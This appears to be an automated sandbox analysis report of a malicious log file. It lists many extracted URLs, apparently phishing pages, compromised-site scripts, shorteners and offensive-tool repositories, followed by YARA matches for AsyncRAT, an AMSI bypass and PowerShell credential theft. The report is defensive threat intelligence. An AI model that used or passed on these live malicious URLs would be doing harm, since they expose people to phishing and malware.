          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://logz.live/frnd/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lussoarch.com/wp-admin/js/error.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://luxtonace.com/luxton/plugins/ckeditor/plugins/a11yhelp/9gysz7pxb.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.emifermetures.xyz/myguy/receiptswift.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://makeshort.link/gxhpg
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://malletteconstruc.com/tphead.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mamulln.cl/kwi/?email=travis_phillips
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://management.azure.com/subscriptions?api-version=2019-11-01
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://mediadigital.site/class-vc.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://microsoftoffice365messaging.typeform.com/to/tdttiewp
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://micrsoft365.live/extension/api-fkdq8720/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://mor32.s3-eu-west-1.amazonaws.com/image2.png
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mutlumedya.com/wp-content/plugins/js_composer/include/autoload/ror2rmo2gr3k3.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://mygreatlearning.com
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://myown.bio/vvg
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nahidsanzida.buet.ac.bd//image/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nahidsanzida.buet.ac.bd//image/sof.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://natalierosenberg.com/wp-content/plugins/jetpack/images/apps/4dyirpzd9bmq.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://ndioma.000webhostapp.com/ghana/next.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://newwets.com/zip/document.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nimbusweb.me/s/share/5235436/fls1p6tk2mxpqwewbxq4
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://o.vg/5qxon3b
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://office.michiganappellateblog.com/soft.dll
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://onlinemicrosoftwebcenter.mfs.gg/kksutjc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://oremoralesabogados.com.pe/scripts/wqpcodwcgmkqsz.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://pages.github.com
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://palmtree-fatdogg.com/blog/wp-includes//wacs/quangcaorongvang/reportdhlnew2.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://panelbroadcast.com/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://partoniroo.com/n9/u.js&&pingo0.org&&cd
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pediatriadrgonzales.com/wp-content/themes/betheme/js/parallax/vrgcm7nkd.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pigeonious.com/img/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://plectrum.sebdelaweb.com/mnmn/index.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://poxy.li/fccdu
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://produsedecalitate.ro/request.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://prowebhq.com/wp-content/themes/twentynineteen/template-parts/content/ldkajkqouw6nel.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://purepowerinc.net/nlugz/082.html
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://raw.githubusercontent.com/elevenpaths/ibombshell/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/netspi/microburst/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://raw.githubusercontent.com/s3cur3th1ssh1t/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rawcdn.githack.net/up.php?key=5
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://rebrand.ly/5crkai2
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://rebrand.ly/6wkxsh9
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://rebrand.ly/b3y54pr
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://rebrand.ly/bgl7jw3
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://rebrand.ly/lejzqer
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reformationtheology.com/2017/01/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://relaja.me/qw5hlk1vcmvqb25azglzywdydxbvlmvz
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://s3.us-east-2.amazonaws.com/cotazion.pago/recibo.html
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://s3r.io/s53yms
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdm.adgsystems.do/send.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secured-scanner.website/?email=yw5kcmv3lmn1cmrac2dzlmnvbq==
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://sendayancity.com/wp-uni/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://sendayancity.com/wp-uni/eiv.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://server.voi-cememnet.xyz/?e=yndpbgxpbmdoyw1ad3loes5vcmc=
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://servermaintenanceerrors.mfs.gg/4lvit89
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://share.bloomcloud.org/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://shortdd.com/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://silindigam.top/ecm/ibm/3755614780/converter.dot
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sitesimobisis.com.br/bin/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://skripon.com/oozoo/document.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smartloan.lk/application/third_party/requests-master/tests/auth/ggqqrzeptva5.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smarttechbv.com.br/wp-content/plugins/wp-fastest-cache/css/fonts/5kbcom4jsnai.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://smpn1kunjangkediri.sch.id/wp-content/uploads/upgrabe/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://soft-gps.com/wp-content/plugins/cvuohucwkp/tre/swt.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://sotein.com.ec/wp-includes1/dhlexpress/dhl/dugzmmp.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spi767igbutt.ru/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spy24.online/bpzpt
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spy24.online/fnexl
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spy24.online/zhmbj
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://staralevator.com/anygas/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://staralevator.com/anygas/nxt.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statement-invoice-remittance-74768477.square.site/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://storage.googleapis.com/adjunto/factura.html
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://submit-form.com/draxgxm0
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://super-giveaway.com/wp-content/uploads/2021/vipe_11/send.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sushiprueba.pegatinastudio.com/images/productos/bebidas/gddwgrtj67g88s.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sviescfze.com/chinaguy1dadgw/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://tales.pt/webmail-purchase/reportexcel.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tapro-trgovina.com/yalladg/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tapro-trgovina.com/yalladg/yalla.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://teachon.aerialview.lk/systemdemo/uploads/addons/__macosx/live-class/f2u4p7u3jk.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themunnarholidays.com/fassets/js/plugin/bxslider/images/pdac4ckn8mkdiq.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://thersshy.dynssl.com//
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://thersshy.dynssl.com//post.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://tiger.hotshot.sk/wp-admin/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tph786.com/gym/assets/css/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tph786.com/sale/images/avatar/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tpow.zeroworld.xyz/home/application/views/sistem/notifikasi/usqg66westx.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/0oulld/i9ch18.dotm
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/vazkus/xp0rg2.dotm
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://triste-mega-down.com/ecm/ibm/3183125126/converter.dot
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tulsabailbondfinancing.com/c2hhbmvazxhwzmyuy29t
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tulsabailbondfinancing.com/dglmzmfueublehbmzi5jb20=
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ultravolt.xyz/.voice/new/?email=jblaauw
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unlibroparatodos.mx/wp-content/themes/divi/epanel/css/tpcsfltfzf9r7yx.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://updatesdomainn.ml/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://updatesdomainn.ml/post.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://upgrade-office.com/presumed8scruple6planer9tabor0novator3softly4unhampered0
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://url.welimitless.in/bqbvn
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.welimitless.in/bvmms
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.welimitless.in/pacdt
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://url.welimitless.in/trjtk
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.welimitless.in/unqkn
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urlsv.vercel.app/375ca8
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://urlsv.vercel.app/be998e
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://vaqww.dyndns.dk/tolly5/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://vaqww.dyndns.dk/tolly5/next.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vija-tech.si/wp-admin/maint/reportexcelindeed2.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vikinproducts.com/brknautodgw/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vikinproducts.com/brknautodgw/index.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://visualscope.org/visual/office/css/nelz.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wahuldva.co.uk/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://waselp.com.sa/wp-includes/widgets/w/s.wbk
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://websekir.com/network/index/processingsetrequestbot/?servername=msi-outfilenetwork.exe
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://wwdurl.com/3nav
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://wwdurl.com/txln
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://www.alliedglobal.marketing/
          Source: notepad.exe, 00000000.00000002.608934300.000001CF7AD07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apple.com/appleca/0
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://www.bot.ax/jiytb
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.emailmeform.com/builder/emf/webssw/mlcrosoft
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://www.emprepyme.com.ar/wp/wp-includes/simplepie/decode/html/brcpaoywx.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mediafire.com/file/frjrn9astpfr2ua/1.htm/file
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.miracleworkstudios.com/wp-content/uploads/2019/12/app/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://www.mygreatlearning.com
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.piriform.com/inapp/installerofferpage
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qualityautopartleads.com/plugins/revolution/fonts/revicons/j6-re45/mine.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://www.sanlorenzoyacht.com/newsl/uploads/docs/1.dotm
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.soul-yemen.org/helpdesk.com/msg/helpdesk/index.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://www.sputnikradio.net/radio/news/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.uscc.gov/sites/default/files/2020-06/june_2020_trade_bulletin.pdf
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://www.vespang.cf/ideshow/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://www.vespang.cf/ideshow/post.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://www.vespang.cf/sizx/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://www.vespang.cf/sizx/post.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ziengineeringco.com/project-arab-contracting/css/dahbzo4xg.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://zo.hen88-dif09.xyz/?e=c3vwcg9ydebsywjvcmxhd3bvc3rlcnnvbmxpbmuuy29t
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zoutomes.hopesrvn.xyz//?e=klamb

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLEMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLEMatched rule: Detects PowerShell content designed to retrieve passwords from host Author: ditekSHen
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLEMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
          Source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
          Source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects PowerShell content designed to retrieve passwords from host Author: ditekSHen
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTRMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTRMatched rule: Detects PowerShell content designed to retrieve passwords from host Author: ditekSHen
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTRMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLEMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLEMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLEMatched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, score = file, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword author = ditekSHen, description = Detects PowerShell content designed to retrieve passwords from host
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
          Source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
          Source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword author = ditekSHen, description = Detects PowerShell content designed to retrieve passwords from host
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTRMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTRMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTRMatched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, score = file, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword author = ditekSHen, description = Detects PowerShell content designed to retrieve passwords from host
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logVirustotal: Detection: 16%
          Source: C:\Windows\System32\notepad.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32
          Source: classification engineClassification label: mal100.troj.expl.evad.mine.winLOG@1/0@0/0
          Source: notepad.exe, 00000000.00000002.608934300.000001CF7AD07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT Key, CurrentCount FROM SdnEx WHERE Key = ? SELECT ID FROM SdnEx WHERE SdnEx.Key = ?; SELECT Count(1) FROM SdnEx; DELETE FROM SdnEx WHERE SdnEx.Key = ?; DELETE FROM SdnEx; INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);
          Source: notepad.exe, 00000000.00000002.608934300.000001CF7AD07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?; SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; DELETE FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; SELECT COUNT(1) FROM FileLowFiAsync; INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?); DELETE FROM FileLowFiAsync WHERE InstanceTimeStamp < ?;
